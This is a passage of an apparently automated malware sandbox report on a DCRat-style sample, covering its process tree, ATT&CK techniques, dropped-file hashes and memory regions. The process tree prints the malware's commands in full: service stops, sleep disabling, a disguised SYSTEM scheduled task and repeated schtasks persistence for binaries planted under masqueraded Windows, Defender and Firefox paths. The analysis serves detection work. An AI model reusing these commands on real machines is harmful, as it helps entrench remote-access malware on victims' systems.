    sc stop bits
    3⤵
    - Launches sc.exe
    PID:2708
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:2348
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:4044
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1448
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:4816
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:3464
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:3208
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:592
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:4848
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nbpkbwke#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:3272
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1968
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:1176
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  - Modifies data under HKEY_USERS
  PID:1080

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3660

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3828

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4012

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3716

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:1640

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:4772

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:716

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2500

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:920

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:1216

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:4936

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2024

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:3312

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2668

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe 73bd398e1b8c07f895893aa35a240b8a fIK50KVngUOuyMvbEtpGYA.0.1.0.0.0
1⤵
- Sets service image path in registry
PID:3624
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:5028

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
PID:2280

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\explorer.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3268

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1872

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1408

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1576

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1068

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4588

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\fontdriversavescrt\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1332

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\fontdriversavescrt\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3596

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\fontdriversavescrt\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3140

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "launcherl" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Defender\ja-JP\launcher.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5088

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "launcher" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\ja-JP\launcher.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3728

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "launcherl" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Defender\ja-JP\launcher.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4560

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 7 /tr "'C:\Program Files\Mozilla Firefox\browser\features\explorer.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1468

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\browser\features\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:208

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 6 /tr "'C:\Program Files\Mozilla Firefox\browser\features\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5068

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ComComponentDriverIntoC" /sc MINUTE /mo 9 /tr "'C:\fontdriversavescrt\ComComponentDriverInto.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4156

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ComComponentDriverInto" /sc ONLOGON /tr "'C:\fontdriversavescrt\ComComponentDriverInto.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1096

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ComComponentDriverIntoC" /sc MINUTE /mo 12 /tr "'C:\fontdriversavescrt\ComComponentDriverInto.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3564

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:3288

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
- Drops file in Windows directory
PID:2620

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
PID:5860

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\WER\Temp\WER39A9.tmp.csv

Filesize
53KB

MD5
75828ceec754bd3279225a75378e42f9

SHA1
4517f41c00d161a284ea1e39b4cf65bb9d518c28

SHA256
670addc914806f77bb016167beea3244f6215ce06a86898c063cdb39553acd54

SHA512
b439b83a32837bd425ab8dca18b1b368f51c9b70676a1378e6792f57b992289d8f45e176cd842fbc2e317690360e04aa561493a06206859099f0daf2fc70a013

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3A36.tmp.txt

Filesize
13KB

MD5
0319f6cc833fb78014b52e5092c281c6

SHA1
00702753eef441df5d7fb7af6fae3f42ea92ade1

SHA256
27104ebc95f4a1583e96d84aae02d8e6bc244327e2d52a9755e897ed3d2d3c62

SHA512
0c8ec6dff9bf1a922637f6bba7a2bb6df35f5c24b7fa90278799c514daf117b3c01e48d9628613aee9cfc3d6cc4f86a54777e6b220cb3767d1af2f95d5c6745e

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER438E.tmp.csv

Filesize
50KB

MD5
7069d06fb94fd25ab9fa2c5d1adc5973

SHA1
f218ee422a435229247fa2ed64efd44f7495d8be

SHA256
f0a8a580981ea8a3d4992d4209d57786e70fd1a47c7b41be89dd79f834d12038

SHA512
d9ceddb9d738dee4f61633d9e029dea4b1b08d0993ec419a3b10baa394fbf3d83898a8090d9cd7d5bd22e0f5335374c249498bd0bbaa3ac00ac591dc05b293d1

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER43AE.tmp.txt

Filesize
13KB

MD5
ff9af70333039b6ee148448c71112411

SHA1
097d7271bfa82f426acaa352d72a85967d5457ba

SHA256
18e94a43c787653e482d79dfef190c05aa19e2c443bfb81ef23efcdc6499e253

SHA512
a5fb173e4186f9739fc7741951ea5fb613c2644200044660c60117db19bf3c0932f42c14ecdbdcf882fba957002a0cdf458fb0a4e48cb27a4ddd1dec972e1bf0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
23909774a4f0358be8e03226d73fbd61

SHA1
4df262994ce4eb3935965881c1e2dc730668da94

SHA256
6dbd177f5aa34f836bf52885c04a3a93771384ebad954911be812c039290bcad

SHA512
6ed0bfd0a498043cccf9ef2d9bebc869c4f5f2befc90636e2e3167b2d0b694c538f93aaeefe221bc08ca3962c6499f402df4934444c9f82883d3314075d5f05b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
3ca1082427d7b2cd417d7c0b7fd95e4e

SHA1
b0482ff5b58ffff4f5242d77330b064190f269d3

SHA256
31f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f

SHA512
bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
a6c9d692ed2826ecb12c09356e69cc09

SHA1
def728a6138cf083d8a7c61337f3c9dade41a37f

SHA256
a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b

SHA512
2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
62623d22bd9e037191765d5083ce16a3

SHA1
4a07da6872672f715a4780513d95ed8ddeefd259

SHA256
95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

SHA512
9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
c493263bea895bb9204bea923c7ec4d7

SHA1
5ca8c342d7dea33a8da8dd3218e16ee77a8f4231

SHA256
49f79e04b40ef149868dfb4526f6d33bf43a33f85d350f710fd99320f59b78d1

SHA512
b0238cd51a8284168447ec5ab93b1b3d88cfa3f23225551c1ed6551a72dd72aaed970760d2cea8cd34582f9b56f3cdb3c3dc027f28896f4b111b06332796f6bd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
59d97011e091004eaffb9816aa0b9abd

SHA1
1602a56b01dd4b7c577ca27d3117e4bcc1aa657b

SHA256
18f381e0db020a763b8c515c346ef58679ab9c403267eacfef5359e272f7e71d

SHA512
d9ca49c1a17580981e2c1a50d73c0eecaa7a62f8514741512172e395af2a3d80aeb0f71c58bc7f52c18246d57ba67af09b6bff4776877d6cc6f0245c30e092d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
5f0ddc7f3691c81ee14d17b419ba220d

SHA1
f0ef5fde8bab9d17c0b47137e014c91be888ee53

SHA256
a31805264b8b13ce4145f272cb2830728c186c46e314b48514d636866217add5

SHA512
2ce7c2a0833f581297c13dd88ccfcd36bf129d2b5d7718c52b1d67c97cbd8fc93abc085a040229a0fd712e880c690de7f6b996b0b47c46a091fabb7931be58d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
bd5940f08d0be56e65e5f2aaf47c538e

SHA1
d7e31b87866e5e383ab5499da64aba50f03e8443

SHA256
2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6

SHA512
c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
e243a38635ff9a06c87c2a61a2200656

SHA1
ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc

SHA256
af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f

SHA512
4418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
e448fe0d240184c6597a31d3be2ced58

SHA1
372b8d8c19246d3e38cd3ba123cc0f56070f03cd

SHA256
c660f0db85a1e7f0f68db19868979bf50bd541531babf77a701e1b1ce5e6a391

SHA512
0b7f7eae7700d32b18eee3677cb7f89b46ace717fa7e6b501d6c47d54f15dff7e12b49f5a7d36a6ffe4c16165c7d55162db4f3621db545b6af638035752beab4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ecceac16628651c18879d836acfcb062

SHA1
420502b3e5220a01586c59504e94aa1ee11982c9

SHA256
58238de09a8817ed9f894ed8e5bf06a897fd08e0b0bd77e508d37b2598edd2a9

SHA512
be3c7cb529cafb00f58790a6f8b35c4ff6db9f7f43a507d2218fd80cebc88413e46f71b1bc35b8afcc36b68f9409c946470d1e74a4fe225400eeb6f3f898f5b3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e6d61810733c8374ff51b5749757fad5

SHA1
a0c9f12c89c4a7295113b054766c1a121edb5f3d

SHA256
9395d32dbde643513464be37967645903f42feb7691a7e8259262c45d8d1a616

SHA512
087bac63bab3e9c4e0770023eb3f100df48d72fc0c942a2c6744367eb43c2f53595cc4d4723f3db8ae7a4f334b2cb3287ad947c929a09f566006aa681c82969b

Download Submit
C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe

Filesize
1.8MB

MD5
95ab7f1022401e488c0c50e6e5e8937f

SHA1
ff312060768d93bc83e157c63f3a583ccacd4967

SHA256
699d1fa49cc0a591ebe89fd50e0a1f1b6131f018b072fb242eaabcce787d84f3

SHA512
4a0e8ea87d0ddbedbcd341b061b9bb7240c4dfe823ba7da5627b53eb017b6ff2a7894b0874c2b0ed8b806c21827cfc686b12c07266d6498208fb5f20ed7ee847

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES2D35.tmp

Filesize
1KB

MD5
d990559ccfe56086227b789cd2d3e3a7

SHA1
60db3e9161af66eb1cba7462b37230c14a25d065

SHA256
e8d376db7dec7b2e28abe1db3795568dedeb58d6a27b7ea0561089787036d518

SHA512
09183c5d8dbce20fd29b879b2739529b95cae268b8688b0005fa9272091f44c6e158e77ab2d1f966610e0e6d45f1397fb7e0387ebb6ee07e750af96351f695f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vbtb10l2.yoi.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\hs.exe

Filesize
5.7MB

MD5
8e222e8f9a186f8d21bf2895e1946853

SHA1
07b2087b8b9d2a2f3c23bf59286c21c6aefbf19f

SHA256
9942c7cc38d9dbcb8bfb81d83a31671fa389409e0f8c4a02db2dbe90e1669ee3

SHA512
6dffaa9204d67b3a5a38441bf8c653b787a3aa3133a298ccbdecb97a4a7887f178a61030ac6d0ba66031a30bce3dd209478c778acba3870d00fcab6ebb3a4d79

Download Submit
C:\Users\Admin\AppData\Local\Temp\launcher.exe

Filesize
256KB

MD5
158fafa10d2218aa47999131194736f2

SHA1
27d12d326a145b771dac80ae1ad87cf7a5b7785a

SHA256
8ba915193e092d44bad17e01c4e5be8fa5278ca2ac3d9769168c666321fc0406

SHA512
b620773d7700d518a5bfb1f71d1d40b5eb9ee6fc1d41ca6a224b3e4395b8510e0d55d6004ad0dee6d99e61c57fedd85bc2f3529f8c9fc08e1b37b853ae4f203b

Download Submit
C:\Users\Admin\AppData\Local\Temp\mMtIUGtOdl.bat

Filesize
161B

MD5
a9e9a7de37d7c3bd7ba2bec6d1414d9f

SHA1
be6b8e3cdc42af2c6b3709842cee91a3a80d9b95

SHA256
c4d1d646c9ce77745dd24357dbcbbf58abad94e260916ef11ab82bd93cea0108

SHA512
61be483240ed5d0d415f3fee5d45e667a783eb436c9eefbdc6d95da428aad813a332d75b59b9972e277de792ac74d7477c594da5fa076977ea1376e1006f47cc

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
4KB

MD5
7b1fe6890101f73a0c9796d8d585b168

SHA1
56eb99ee341b880cf7a80ebc705371aea87b3743

SHA256
93ea56ad38069dbc3d1ae192afd3f3dc8704e9298752f73729b95cf3298dcaca

SHA512
fe73cccfadc916f613fbcc7a80ec82ae1228ea2aa28bba4515851e82463e76942ff3a3d6bcc78ea666a841d89220fb49b8fa52279985e88fe0aec6728f21aefa

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2722730a0cf82161fb1452b600334796

SHA1
4479415f50cd9ab55c4f7bcdc1a0a5177492f053

SHA256
a44ba59eb52b4d6555065fa840ac7162080eb538e6b6a47198fe4961d0297833

SHA512
54ec97b79003db56fb1ca44b33a1c2a9748014a3c1dc84fdb2afca84d3c6618ad88ccb353d52078789e3e0ed0ee6c763a74bf34cea1334e427a264db9171dfb0

Download Submit
C:\fontdriversavescrt\ComComponentDriverInto.exe

Filesize
1.9MB

MD5
8d58be13eeee305849826f3565270495

SHA1
764fffa3dc6bb1f6f623d79e463e91f55c39b143

SHA256
0885bc58cd5a6f959a45896714dedede1b8b325b2f25e1c6d94d29e113c16cb5

SHA512
9ebc64e96217f09f70c84edc0b0b64d60134c675fbca4bfbca02360507b98a95389a1fe9f4688898cbd97d146c24f9ca06c6cf78aaf1c9578c0cf64b2c9a1d0e

Download Submit
C:\fontdriversavescrt\OHRUZlNyrkuiImPm8IL2cpmlknwyRgjXew4XDjDWHSF.bat

Filesize
212B

MD5
65e7f71966f823f7b9e3d2b5f5f1008c

SHA1
5fe168632a5710dad2da9dbe679ba84c5ba6431d

SHA256
507f22e1ba71fb597207ece1889bc2c32d0472cf11bc5e3da713e34204c2050e

SHA512
56fc7df5b3b519b03abe5f7268ea7690395bfdbc994bfc64ade17998c790075e3219966773e8d8c98edc3c8ffcf06389425399ab28921905299abb287f3ec3c6

Download Submit
C:\fontdriversavescrt\mxUJuDSBL8uYxNL3S2me9mvpl9XOE7C7oXpLzzbyKUU0.vbe

Filesize
251B

MD5
33ef80f1d0bf92148b2b4030624e6101

SHA1
03d151e3db14476ef74167bc972cf3d034f8fec4

SHA256
898a085b6aa1bb6b8f8c15e3ef98225fbcdb5c0b4330924cffa11f97f8870c06

SHA512
b38dccf884d0c5bde46441cbf12a9e32da156149133cfc8427972751bd06a953ab25681886e4698b9e285322cda7c1115a7c485baa2588213574c4b3d8c03ea4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\q4e4ntzq\q4e4ntzq.0.cs

Filesize
366B

MD5
c2e06c8c4c6a680bf38b0e135261447b

SHA1
5fb6a949b5f8476132ca48cb6812de28adcc8f9b

SHA256
024a7b17010dd879d1f74b9ff8a31bac111963a687430d71c4a36b5150e21da6

SHA512
9d9e87ce316be98c877ee6be535db36fd4f9b5493778b72752455a54d146d70ce64882ba02fe57f4a47129814a3f5fb462c082ac95e972337d5aadd129673a30

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\q4e4ntzq\q4e4ntzq.cmdline

Filesize
235B

MD5
71bdf28af9a30c81ffc1da998b669558

SHA1
d3d8eca7dc7d39936f659825df2d4557f81980a0

SHA256
5dad8ddb67c914bdcde558e23fbd087ddf05b7da1aa59acef1470bdfab5107d5

SHA512
ccdf426722a62ec2429425c8f3ba2258c26a31d3efd5853827a70e7be15b94e2d522421f895cdf7bd893be94834bb5ddaa7ad349bb836f4d9336ff31e0a477fe

Download Submit
\??\c:\Windows\System32\CSCCCAA06A3ED9442AAA71A8CCAD71A8499.TMP

Filesize
1KB

MD5
634e281a00b7b9f516c3048badfa1530

SHA1
af6369715ce2fe9b99609e470d4f66698880a35a

SHA256
0d990336ae793f3f6903048004c8d707d7a7191927bd7df46b7fe887116506c8

SHA512
1cb35fa0759f5362c9c7eee5546710874121005a3924bcfec2cf33ac90a257a807ce7ec0db7bc84dcb327604d708009449c34f52560ed936b54eeba49be7d27b

Download Submit
memory/232-411-0x00000251BB600000-0x00000251BB61C000-memory.dmp

Filesize
112KB

Download
memory/232-408-0x00000251BB3C0000-0x00000251BB3DC000-memory.dmp

Filesize
112KB

Download
memory/232-409-0x00000251BB3E0000-0x00000251BB495000-memory.dmp

Filesize
724KB

Download
memory/232-410-0x00000251BB3B0000-0x00000251BB3BA000-memory.dmp

Filesize
40KB

Download
memory/232-412-0x00000251BB5E0000-0x00000251BB5EA000-memory.dmp

Filesize
40KB

Download
memory/232-413-0x00000251BB640000-0x00000251BB65A000-memory.dmp

Filesize
104KB

Download
memory/232-414-0x00000251BB5F0000-0x00000251BB5F8000-memory.dmp

Filesize
32KB

Download
memory/232-415-0x00000251BB620000-0x00000251BB626000-memory.dmp

Filesize
24KB

Download
memory/232-416-0x00000251BB630000-0x00000251BB63A000-memory.dmp

Filesize
40KB

Download
memory/336-64-0x000001FD0B5C0000-0x000001FD0B5E7000-memory.dmp

Filesize
156KB

Download
memory/336-65-0x00007FFCCB3D0000-0x00007FFCCB3E0000-memory.dmp

Filesize
64KB

Download
memory/468-70-0x000002A6D3760000-0x000002A6D3787000-memory.dmp

Filesize
156KB

Download
memory/468-71-0x00007FFCCB3D0000-0x00007FFCCB3E0000-memory.dmp

Filesize
64KB

Download
memory/616-53-0x000001E07DD40000-0x000001E07DD61000-memory.dmp

Filesize
132KB

Download
memory/616-54-0x000001E07DD80000-0x000001E07DDA7000-memory.dmp

Filesize
156KB

Download
memory/616-55-0x00007FFCCB3D0000-0x00007FFCCB3E0000-memory.dmp

Filesize
64KB

Download
memory/676-59-0x00007FFCCB3D0000-0x00007FFCCB3E0000-memory.dmp

Filesize
64KB

Download
memory/676-58-0x0000021A1BF20000-0x0000021A1BF47000-memory.dmp

Filesize
156KB

Download
memory/960-67-0x0000013A295D0000-0x0000013A295F7000-memory.dmp

